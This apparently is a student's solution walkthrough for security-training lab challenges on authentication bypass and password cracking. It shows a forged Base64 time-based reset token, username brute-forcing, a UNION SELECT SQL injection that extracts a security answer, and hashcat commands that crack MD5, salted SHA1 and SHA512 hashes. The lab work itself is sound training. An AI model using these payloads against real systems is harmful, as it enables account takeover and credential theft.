Unit 6 and 5 solutions

--- title: Unit 6 and 5 solutions --- # User Authentication Challenge 2 and 3 #### User Authentication Challenge 2 * Click forgotten password. * username admin and click on Send Email * You will see something like below **URL with embedded password reset token has been sent to 'admin' via email.* ![](https://i.imgur.com/3T9oDVw.png) * Inspect the page and grab data under script scroll down until you see something associated with change password. --> reset form * You can search using word "leform" to find the script details ![](https://i.imgur.com/WeBdeti.png) - type: "POST", url: "7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1ChangePass", data: { userName: theUserName, newPassword: theNewPassword, resetPasswordToken: theToken }, - Send 'reset password' link to repeater. where you submitted admin, - which looks like : ![](https://i.imgur.com/qF4D9n7.png) - Now edit fields - First change the POST to above URL - /challenges/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1ChangePass - Add new fields - userName=admin&newPassword=Test123456789&resetPasswordToken=Test - Send : you will receive error : Could not parse/manipulate date or time from token: java.text.ParseException: Unparseable date: "M? - ![](https://i.imgur.com/DYwTjmB.png) - This says we need to encode what we are submitting under token, I used base 64 tested. - Now you will get error related to time, So encode your current time using base 64. - The way it works is - Sat Oct 15 07:49:00 PDT 2022 - Above is the format you need to submit after encoding to Base 64. - Note: Use current time with right timezone, i.e during daylight savings use pdt/edt/cdt and all(based on location you are in) and remainder of the year use pst/cst/est. - Finally you will have something like - userName=admin&newPassword=Test123456789&resetPasswordToken=RnJpIE1hciAyNSAxOTo0OTowMCBQRFQgMjAyMg== ![](https://i.imgur.com/FugVajt.png) Once you send this you will see password success message, you need to login as admin and the above password you used ![](https://i.imgur.com/Uu3hOyH.png) **NOTE: Use your exact time where you are in, day light savings only applicable to USA.** ---- #### User Authentication Challenge 3 ## Method 1: - login with admin and password, we need username. - So used bruteforce with random set of names as payload in place of admin. - One of the name works is 'sean', with random password once you submit, you will get email : zoidberg24@shepherd.com - Click on have you forgetten password to get security question - zoidberg24@shepherd.com - You will get What is the first name of the person you first kissed? - write a query on email block - " UNION ALL SELECT secretAnswer FROM users WHERE username="sean - You will get answer as Ronit Tornincasa - Now submit email and answer for secret key ![](https://i.imgur.com/TIg2uJi.png) ## Method 2: - Login as manager / root / Administrator ### root : elitehacker@shepherd.com ### username : Administrator - You will endup with email : buzzthebald@shepherd.com - click on forgot password security question : What is the last name of the teacher who gave you your first failing grade? - Use query or Bruteforce. ---- Use Cyberchef or hashcat for remaining problems - I only cover hashcat part here. - To install hashcat follow instructions: - https://courses.codepath.com/courses/tech_fellow_training/unit/6#!lab Pre-steps: - Install Kali image from docker: 1. Spin up kali by running `docker pull kalilinux/kali-rolling` 2. To run interactive more `docker run --tty --interactive kalilinux/kali-rolling /bin/bash` 3. Update Kali `apt-get update` 4. Install hashcat `apt-get install hashcat` 5. run hashcat to confirm that its installed properly 6. Create rockyou-75.txt password file 7. To install vi editor first run `apt-get update` and `apt-get install vim` 8. create file `touch rockyou-75.txt` 9. `vi rockyou-75.txt` 10. click `i` to insert --> copy paste everything from here https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Leaked-Databases/rockyou-75.txt 11. Wait until its completed and once done click 'esc' and type `:wq!` to save the file. Note: read `hashcat --help` to understand what each command means --- - ### Password Hashing 1 - Create test.txt file with md5 hash on it. - run `hashcat -m 0 -a 0 test.txt rockyou-75.txt` - to view the plaintext - `hashcat -m 0 -a 0 test.txt rockyou-75.txt --show` - -m --> hash-type - 0 --> Hash mode --> MD5 - -a --> Attack-mode - 0 --> Attack mode --> Straight ![](https://i.imgur.com/H78OXMt.png) ![](https://i.imgur.com/1EeR7yp.png) --- - ### Password Hashing 2 - save hash to test.txt file by adding salt towards end - ```dc6f0dbebfc5747330deeedfbd8475568a740d0a:80808080``` - `hashcat -m 120 -a 0 test.txt rockyou-75.txt` After the command is complete you will able to see key same as above challenge ![](https://i.imgur.com/Ou5yCn9.png) --- - ### Password Hashing 3: - Save your hash to file again ```FF8D646AC52B7794ADADDAAD606042FF6D2D71C5B91CBF1C11D411C790419CF1651EBE71551CD1973ABAC9D32D1392122CC676F4AA8494E7DA6325A1050FD2DA:31415926535897932384626433832795028841``` ![](https://i.imgur.com/OYKsBQH.png) - `hashcat -m 1710 -a 0 test.txt rockyou-75.txt` --- - ### Password Hashing 4: - save hash to file again - I saved my file as 4.txt - `hashcat -m 100 -a 3 4.txt ?d?d?d?d?d?d?d?d?d?d` Note: read hash modes and attack modes by running `hashcat --help` ----